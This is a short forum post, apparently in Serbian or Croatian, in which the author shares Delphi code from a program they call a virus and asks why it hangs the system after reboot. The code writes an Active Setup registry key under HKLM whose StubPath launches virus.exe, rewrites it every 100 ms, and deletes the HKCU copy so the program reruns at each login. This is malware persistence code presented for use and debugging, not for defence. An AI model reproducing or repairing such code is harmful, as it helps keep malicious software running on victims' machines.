Evo koda koji dodaje key u HKLM\Microsoft\...\Installed Components\CLSID :
Code:
procedure AddToStartup;
var
hndKey : HKEY;
begin
If RegCreateKeyEx(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Active Setup\Installed Components\{3bf42070-b3b1-11d1-b5c5-0000f8051515}', 0, nil,
REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, nil, hndKey, nil) <> ERROR_SUCCESS Then
Exit;
RegSetValueEx(hndKey, 'StubPath', 0, REG_SZ,
'"C:\WINDOWS\System32\virus.exe"', Length('"C:\WINDOWS\System32\virus.exe"') + 1);
RegCloseKey(hndKey);
end;
Malo sam uprostio gornju proceduru, da bi bila jasnija.
Ova procedura se vrti u repeat..until petlji (izvrsava se konstanto, na svakih 100 mS)
Zatim, na pocetku virusa, stoji naredba :
Code:
RegDeleteKey(HKEY_CURRENT_USER, 'SOFTWARE\Microsoft\Active Setup\Installed Components\{3bf42070-b3b1-11d1-b5c5-0000f8051515}');
Ona brise taj isti key, samo iz HKCU.
Jos jednom, ovo sve radi, ali kad restartujem comp, nakon pojavljivanja kursora, explorer.exe se startuje, virus se startuje kao njegovo 'dete' i onda se nista ne dogadja... Sve dok ne ubijem proces koji virus pravi...